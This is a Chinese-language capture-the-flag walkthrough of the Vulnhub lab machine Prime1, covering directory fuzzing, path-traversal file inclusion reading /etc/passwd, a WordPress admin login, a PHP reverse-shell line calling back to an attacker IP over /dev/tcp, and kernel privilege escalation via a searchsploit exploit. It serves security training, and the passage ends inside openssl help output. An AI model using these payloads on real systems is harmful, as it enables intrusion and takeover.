Vulnhub靶机:Prime1
第一种解法
主机发现
nmap扫描与分析
Web渗透
目录爆破与模糊测试
文件包含利用
获得Wordpress后台权限
获得初始系统shell
系统内核漏洞提权
Rooted和总结
🔑基本概念与权限操作
🔍端口扫描技术与参数
老规矩,一把梭~
📊扫描与信息收集
只开了22和80
那重点就放在80端口的web上面
└─# dirb http://192.168.100.110
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Sep 7 13:17:27 2024
URL_BASE: http://192.168.100.110/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.100.110/ ----
+ http://192.168.100.110/dev (CODE:200|SIZE:131)
+ http://192.168.100.110/index.php (CODE:200|SIZE:136)
==> DIRECTORY: http://192.168.100.110/javascript/
+ http://192.168.100.110/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.100.110/wordpress/
---- Entering directory: http://192.168.100.110/javascript/ ----
==> DIRECTORY: http://192.168.100.110/javascript/jquery/
---- Entering directory: http://192.168.100.110/wordpress/ ----
+ http://192.168.100.110/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-content/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-includes/
+ http://192.168.100.110/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.100.110/javascript/jquery/ ----
+ http://192.168.100.110/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/ ----
+ http://192.168.100.110/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/includes/
+ http://192.168.100.110/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/user/
---- Entering directory: http://192.168.100.110/wordpress/wp-content/ ----
+ http://192.168.100.110/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.100.110/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.100.110/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/network/ ----
+ http://192.168.100.110/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.100.110/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/user/ ----
+ http://192.168.100.110/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.100.110/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.100.110/wordpress/wp-content/plugins/ ----
+ http://192.168.100.110/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.100.110/wordpress/wp-content/themes/ ----
+ http://192.168.100.110/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.100.110/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Sep 7 13:17:55 2024
DOWNLOADED: 46120 - FOUND: 15
第一个扫出来的路径是/dev
我们访问是这样一段
翻译后就是说我们在level 0 让我们更努力的去挖掘
我们指定拓展名
-X指定拓展名
.zip和.txt
看起来你有一些秘密。
我只是想帮你。
对你找到的php的每一页都做一些模糊处理。如果
您可以获得任何正确的参数,然后按照以下步骤操作。如果你仍然卡住
从这里学习一个对OSCP有很好用法的基本工具。
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//查看location.txt,您将获得下一步行动//
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://website-ip/index.php?FUZZ=something
这里的index.php就是主页,而且我们去看过了,所以这个image.php就很可疑
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://website-ip/index.php?FUZZ=something这里最开始我们先不使用筛选器
就是不使用--hc 404 --hw 500
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.100.110/image.php?FUZZ=RedteamNotes└─# wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.100.110/image.php?FUZZ=RedteamNotes
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.100.110/image.php?FUZZ=RedteamNotes
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 6 L 12 W 147 Ch "@"
000000034: 200 6 L 12 W 147 Ch "adm"
000000033: 200 6 L 12 W 147 Ch "active"
000000015: 200 6 L 12 W 147 Ch "2001"
000000003: 200 6 L 12 W 147 Ch "01"
000000035: 200 6 L 12 W 147 Ch "admin"
000000031: 200 6 L 12 W 147 Ch "action"
000000030: 200 6 L 12 W 147 Ch "accounting"
000000007: 200 6 L 12 W 147 Ch "10"
000000032: 200 6 L 12 W 147 Ch "actions"
000000029: 200 6 L 12 W 147 Ch "account"
000000023: 200 6 L 12 W 147 Ch "aaa"
000000022: 200 6 L 12 W 147 Ch "aa"
000000026: 200 6 L 12 W 147 Ch "academic"
000000028: 200 6 L 12 W 147 Ch "accessgranted"
000000024: 200 6 L 12 W 147 Ch "abc"
000000025: 200 6 L 12 W 147 Ch "about"
000000021: 200 6 L 12 W 147 Ch "a"
000000027: 200 6 L 12 W 147 Ch "access"
000000020: 200 6 L 12 W 147 Ch "3"
000000019: 200 6 L 12 W 147 Ch "2005"
000000012: 200 6 L 12 W 147 Ch "20"
000000066: 200 6 L 12 W 147 Ch "appliance"
000000080: 200 6 L 12 W 147 Ch "auth"
000000075: 200 6 L 12 W 147 Ch "aspadmin"
000000077: 200 6 L 12 W 147 Ch "attach"
000000079: 200 6 L 12 W 147 Ch "audit"
000000076: 200 6 L 12 W 147 Ch "assets"
000000073: 200 6 L 12 W 147 Ch "arrow"
000000071: 200 6 L 12 W 147 Ch "archive"
000000072: 200 6 L 12 W 147 Ch "archives"
000000078: 200 6 L 12 W 147 Ch "attachments"
000000074: 200 6 L 12 W 147 Ch "asp"
省略很多
000000051: 200 6 L 12 W 147 Ch "agents"
000000047: 200 6 L 12 W 147 Ch "adminsql"
000000041: 200 6 L 12 W 147 Ch "Administration"
000000044: 200 6 L 12 W 147 Ch "admin_login"
000000045: 200 6 L 12 W 147 Ch "adminlogon"
000000046: 200 6 L 12 W 147 Ch "admin_logon"
000000048: 200 6 L 12 W 147 Ch "admon"
000000039: 200 6 L 12 W 147 Ch "administrat"
000000037: 200 6 L 12 W 147 Ch "admin_"
000000040: 200 6 L 12 W 147 Ch "administration"
000000043: 200 6 L 12 W 147 Ch "adminlogin"
000000081: 200 6 L 12 W 147 Ch "auto"
000000087: 200 6 L 12 W 147 Ch "backoffice"
000000111: 200 6 L 12 W 147 Ch "binaries"
000000922: 200 6 L 12 W 147 Ch "wellcome"
000000921: 200 6 L 12 W 147 Ch "welcome"
000000920: 200 6 L 12 W 147 Ch "webvpn"
000000918: 200 6 L 12 W 147 Ch "webstat"
000000919: 200 6 L 12 W 147 Ch "webstats"
000000917: 200 6 L 12 W 147 Ch "website"
000000915: 200 6 L 12 W 147 Ch "webservice"
000000914: 200 6 L 12 W 147 Ch "websearch"
000000916: 200 6 L 12 W 147 Ch "webservices"
000000913: 200 6 L 12 W 147 Ch "webmaster"
000000912: 200 6 L 12 W 147 Ch "webmail"
000000910: 200 6 L 12 W 147 Ch "weblogic"
000000911: 200 6 L 12 W 147 Ch "weblogs"
000000906: 200 6 L 12 W 147 Ch "webdist"
000000908: 200 6 L 12 W 147 Ch "WEB-INF"
000000905: 200 6 L 12 W 147 Ch "webdav"
000000909: 200 6 L 12 W 147 Ch "weblog"
000000904: 200 6 L 12 W 147 Ch "webdata"
000000902: 200 6 L 12 W 147 Ch "webboard"
000000901: 200 6 L 12 W 147 Ch "webapp"
000000903: 200 6 L 12 W 147 Ch "webcart"
000000898: 200 6 L 12 W 147 Ch "web"
000000897: 200 6 L 12 W 147 Ch "wdav"
000000894: 200 6 L 12 W 147 Ch "W3SVC2"
000000900: 200 6 L 12 W 147 Ch "webadmin"
000000896: 200 6 L 12 W 147 Ch "warez"
000000945: 200 6 L 12 W 147 Ch "xsl"
000000949: 200 6 L 12 W 147 Ch "zip"
000000943: 200 6 L 12 W 147 Ch "xml"
000000946: 200 6 L 12 W 147 Ch "xsql"
000000944: 200 6 L 12 W 147 Ch "xmlrpc"
000000951: 200 6 L 12 W 147 Ch "zips"
000000950: 200 6 L 12 W 147 Ch "zipfiles"
000000948: 200 6 L 12 W 147 Ch "zap"
000000947: 200 6 L 12 W 147 Ch "xyz"
Total time: 0
Processed Requests: 951
Filtered Requests: 0
Requests/sec.: 0
然后再根据结果进行赛选
这里面有很多147Ch 就是147Char
我们使用--hh参数来过滤
--hc/hl/hw/hh N[,N]+ : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 147 http://192.168.100.110/image.php?FUZZ=RedteamNotes
结果发现没有结果。。。
--hw 12ye
image.php原来是个烟雾弹。。。。
最终还是在index.php页面上找到的
我们去看一下file参数是干啥的
提示我们干的不错,但是你挖错了文件
我们加上之前提示的参数location.txt去试一下
http://192.168.100.110/index.php?file=location.txt
好吧,现在你知道确切的参数了
现在再挖一些下一个
在其他php页面上使用'secretier360'参数以获得更多乐趣。
他说了是其他php页面,除了这个index.php也就是这个image.php了
curl http://192.168.100.110/image.php?secrettier360=
这里我们就要自己发挥了,他可以读取文件,那就应该想到本地文件包含
因为之前的测试中已经使用到了file=location
这就是本地文件包含
curl http://192.168.100.110/image.php?secrettier360=../../../../../../../etc/passwd
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>将这些用户保存到本地,然后查看一些谁有登录权限
除了root用户就一个victor有
窒息看
emmm,拿到一组密码
follow_the_ippsec
尝试ssh登录
然后我们前面知道这是一个wordpress站点,我们可以试一下
因为他是最著名的CMS系统
wpscan 的命令参数特别多
-e, --enumerate [OPTS] Enumeration Process
Available Choices:
vp Vulnerable plugins
ap All plugins
p Popular plugins
vt Vulnerable themes
at All themes
t Popular themes
tt Timthumbs
cb Config backups
dbe Db exports
u User IDs range. e.g: u1-5
Range separator to use: '-'
Value if no argument supplied: 1-10
m Media IDs range. e.g m1-15
Note: Permalink setting must be set to "Plain" for those to be detected
Range separator to use: '-'
Value if no argument supplied: 1-100
Separator to use between the values: ','
Default: All Plugins, Config Backups
Value if no argument supplied: vp,vt,tt,cb,dbe,u,m
Incompatible choices (only one of each group/s can be used):
- vp, ap, p
- vt, at, t
-e, --enumerate [OPTS] 枚举过程
可用选项:
vp 易受攻击的插件
ap 所有插件
p 热门插件
vt 易受攻击的主题
at 所有主题
t 热门主题
tt Timthumbs
cb 配置备份
dbe Db 导出
u 用户 ID 范围。例如:u1-5
要使用的范围分隔符:'-'
如果未提供参数,则值为:1-10
m 媒体 ID 范围。例如 m1-15
注意:要检测这些链接,必须将永久链接设置为“纯文本”
使用的范围分隔符:'-'
如果未提供参数,则为:1-100
值之间使用的分隔符:','
默认:所有插件、配置备份
如果未提供参数,则为:vp、vt、tt、cb、dbe、u、m
不兼容的选项(每个组只能使用一个):
- vp、ap、p
- vt、at、twpscan --url http://192.168.100.110/wordpress -e u
u User IDs range. e.g: u1-5
└─# wpscan --url http://192.168.100.110/wordpress -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.100.110/wordpress/ [192.168.100.110]
[+] Started: Sun Sep 8 10:11:29 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.100.110/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.100.110/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.100.110/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.100.110/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.100.110/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
| - http://192.168.100.110/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.100.110/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2024-07-16T00:00:00.000Z
| Readme: http://192.168.100.110/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://192.168.100.110/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.100.110/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Sep 8 10:11:31 2024
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 17.017 KB
[+] Data Received: 21.981 MB
[+] Memory used: 182.785 MB
[+] Elapsed time: 00:00:02
重点
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)这里枚举出来一个victor用户
victor
follow_the_ippsec
直接登录后台
http://192.168.100.110/wordpress/wp-admin/
并且成功登录了
在登录进wordpress后台之后,我们的操作就是很套路话了,只有哪几个点
插件
主题
看底部的字
You need to make this file writable before you can save your changes. See the Codex for more information.
您需要先使此文件可写,然后才能保存更改。请参阅 Codex 了解更多信息。
这里面的页面一个一个找,不是每个文件都有写的权限
最终~找到了一个可以修改的php文件
插入反弹语句
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.100.100/443 0>&1'");?>
最终我们找到触发他的路径是
http://192.168.100.110/wordpress/wp-content/themes/twentynineteen/secret.php
成功收到反弹shell
ok,到此我们就已经拿到了立足点
我们先翻一翻,和做一些信息收集,以便后面的提权
这里我们可以看到不需要密码就可以执行(root) NOPASSWD: /home/saket/enc
然后看一下内核版本,尝试一些内核提权
这里版本有两个提权的
先复制下来看看
searchsploit -m 45010
然后看看内容是啥
/*
Credit @bleidl, this is a slight modification to his original POC
https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c
For details on how the exploit works, please visit
https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Tested on Ubuntu 16.04 with the following Kernels
4.4.0-31-generic
4.4.0-62-generic
4.4.0-81-generic
4.4.0-116-generic
4.8.0-58-generic
4.10.0.42-generic
4.13.0-21-generic
Tested on Fedora 27
4.13.9-300
gcc cve-2017-16995.c -o cve-2017-16995
internet@client:~/cve-2017-16995$ ./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880038c3f500
[*] Leaking sock struct from ffff88003af5e180
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880038704600
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880038704600
[*] credentials patched, launching shell...
#id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(internet)
*/
这里写的很简单,编译命令也写好了
gcc 45010.c -o 45010
这里可以本地编译也可以上传到目标靶机上再便宜都可以
这里我们kali先起一个php服务,用来上传文件
php -S 0:80
一般都选择/tmp目录,因为这个目录一般会有执行权限,不会受到限制
这里将45010和45010.c源文件.c也上传上去,
因为在kali编译好的可能会用不了,还需要在目标靶机上编译才能使用
wget http://192.168.100.100/45010
wget http://192.168.100.100/45010.c
ok~拿下
💡信息分析与突破
🔐安装配置页的漏洞
🔓破解SSH与CMS漏洞
🌐URL传递数据与提权
💾FTP下载与隐藏信息
⚙️参数设置与协议扫描
第二种提权解法
在从wordpress后台那里拿到初始反弹shell后,我们除了内核提权,我们还有别的方法,因为内核提权对系统的破坏性是未知的,可能使用了就导致系统故障,或者服务重启,导致我们初始shell的丢失。
这里我们回到刚拿到wordpress反弹shell的时候,
然后我们经过查看/etc/password文件查看到的
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
然后我们到/home/saket下查看
find / -name '*backup*' 2>/dev/null | sort | less
/opt/backup
/opt/backup/server_database/backup_pass
最终我们还是找到了enc的密码
backup_password
这里涉及到一个非常重要的点
就是echo输出的时候会带上一个换行符
这会导致生成的md5值安全不一样,关键点就在这个换行符上
所以在使用echo 时要带上一个-n参数,
让他不输出这个换行符
└─# echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}'
366a74cb3c959de17d61db30591c39d1
现在要干的就是通过这个key,
去解开下面这一段
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
echo -n 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -CipherType -K
我们先把openssl 的帮助看清楚
─# openssl --help
help:
Standard commands
标准命令
asn1parse ca ciphers cmp
cms crl crl2pkcs7 dgst
dhparam dsa dsaparam ec
ecparam enc engine errstr
fipsinstall gendsa genpkey genrsa
help info kdf list
mac nseq ocsp passwd
pkcs12 pkcs7 pkcs8 pkey
pkeyparam pkeyutl prime rand
rehash req rsa rsautl
s_client s_server s_time sess_id
smime speed spkac srp
storeutl ts verify version
x509
Message Digest commands (see the `dgst' command for more details)
blake2b512 blake2s256 md4 md5
rmd160 sha1 sha224 sha256
sha3-224 sha3-256 sha3-384 sha3-512
sha384 sha512 sha512-224 sha512-256
shake128 shake256 sm3
Cipher commands (see the `enc' command for more details)
aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb
aes-256-cbc aes-256-ecb aria-128-cbc aria-128-cfb
aria-128-cfb1 aria-128-cfb8 aria-128-ctr aria-128-ecb
aria-128-ofb aria-192-cbc aria-192-cfb aria-192-cfb1
aria-192-cfb8 aria-192-ctr aria-192-ecb aria-192-ofb
aria-256-cbc aria-256-cfb aria-256-cfb1 aria-256-cfb8
aria-256-ctr aria-256-ecb aria-256-ofb base64
bf bf-cbc bf-cfb bf-ecb
bf-ofb camellia-128-cbc camellia-128-ecb camellia-192-cbc
camellia-192-ecb camellia-256-cbc camellia-256-ecb cast
cast-cbc cast5-cbc cast5-cfb cast5-ecb
cast5-ofb des des-cbc des-cfb
des-ecb des-ede des-ede-cbc des-ede-cfb
des-ede-ofb des-ede3 des-ede3-cbc des-ede3-cfb
des-ede3-ofb des-ofb des3 desx
rc2 rc2-40-cbc rc2-64-cbc rc2-cbc
rc2-cfb rc2-ecb rc2-ofb rc4
rc4-40 seed seed-cbc seed-cfb
seed-ecb seed-ofb sm4-cbc sm4-cfb
sm4-ctr sm4-ecb sm4-ofb zlib
zstd这里需要把除了标准命令以外的命令都保存下来,后面需要写个脚本
保存成这样
└─# cat CipherTypeRaw
blake2b512 blake2s256 md4 md5
rmd160 sha1 sha224 sha256
sha3-224 sha3-256 sha3-384 sha3-512
sha384 sha512 sha512-224 sha512-256
shake128 shake256 sm3
aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb
aes-256-cbc aes-256-ecb aria-128-cbc aria-128-cfb
aria-128-cfb1 aria-128-cfb8 aria-128-ctr aria-128-ecb
aria-128-ofb aria-192-cbc aria-192-cfb aria-192-cfb1
aria-192-cfb8 aria-192-ctr aria-192-ecb aria-192-ofb
aria-256-cbc aria-256-cfb aria-256-cfb1 aria-256-cfb8
aria-256-ctr aria-256-ecb aria-256-ofb base64
bf bf-cbc bf-cfb bf-ecb
bf-ofb camellia-128-cbc camellia-128-ecb camellia-192-cbc
camellia-192-ecb camellia-256-cbc camellia-256-ecb cast
cast-cbc cast5-cbc cast5-cfb cast5-ecb
cast5-ofb des des-cbc des-cfb
des-ecb des-ede des-ede-cbc des-ede-cfb
des-ede-ofb des-ede3 des-ede3-cbc des-ede3-cfb
des-ede3-ofb des-ofb des3 desx
rc2 rc2-40-cbc rc2-64-cbc rc2-cbc
rc2-cfb rc2-ecb rc2-ofb rc4
rc4-40 seed seed-cbc seed-cfb
seed-ecb seed-ofb sm4-cbc sm4-cfb
sm4-ctr sm4-ecb sm4-ofb zlib
zstdawk '{gsub(/ /,"\n");print}' CipherTypeRaw | sort | uniq > CipherTypeRawsgsub(/ /,"\n"):gsub 是 awk 中的全局替换函数,它会在当前行的所有位置查找并替换匹配的内容。
/ /是查找的目标,即空格字符(空格分隔的元素)。"\n"是替换的内容,即换行符。这意味着将行中的每个空格替换为换行符,使每个空格分隔的元素各占一行。
sort
对通过 awk 处理后的输出进行排序。sort 是用于对文本行进行排序的命令。默认情况下,它按字典顺序对输出进行排序。
uniq
uniq 是用于去除排序后相邻的重复行的命令。注意,uniq 只能去除相邻的重复项,因此必须先通过 sort 排序,使相同的元素相邻。
还有一个文本key.txt
cat key.txt
我知道你是 ippsec 的粉丝。
因此,将字符串“ippsec”转换为 md5 哈希,并使用它来获得你自己的真实形式。
这里需要看openssl enc --help
└─# openssl enc --help
Usage: enc [options]
General options:
-help Display this summary
-list List ciphers
-ciphers Alias for -list
-e Encrypt
-d Decrypt
-p Print the iv/key
-P Print the iv/key and exit
-engine val Use engine, possibly a hardware device
Input options:
-in infile Input file
-k val Passphrase
-kfile infile Read passphrase from file
Output options:
-out outfile Output file
-pass val Passphrase source
-v Verbose output
-a Base64 encode/decode, depending on encryption flag
-base64 Same as option -a
-A Used with -[base64|a] to specify base64 buffer as a single line
Encryption options:
-nopad Disable standard block padding
-salt Use salt in the KDF (default)
-nosalt Do not use salt in the KDF
-debug Print debug info
-bufsize val Buffer size
-K val Raw key, in hex
-S val Salt, in hex
-iv val IV in hex
-md val Use specified digest to create a key from the passphrase
-iter +int Specify the iteration count and force the use of PBKDF2
Default: 10000
-pbkdf2 Use password-based key derivation function 2 (PBKDF2)
Use -iter to change the iteration count from 10000
-none Don't encrypt
-saltlen +int Specify the PBKDF2 salt length (in bytes)
Default: 16
-z Compress or decompress encrypted data using zlib
-* Any supported cipher
Random state options:
-rand val Load the given file(s) into the random number generator
-writerand outfile Write random data to the specified file
Provider options:
-provider-path val Provider load path (must be before 'provider' argument if required)
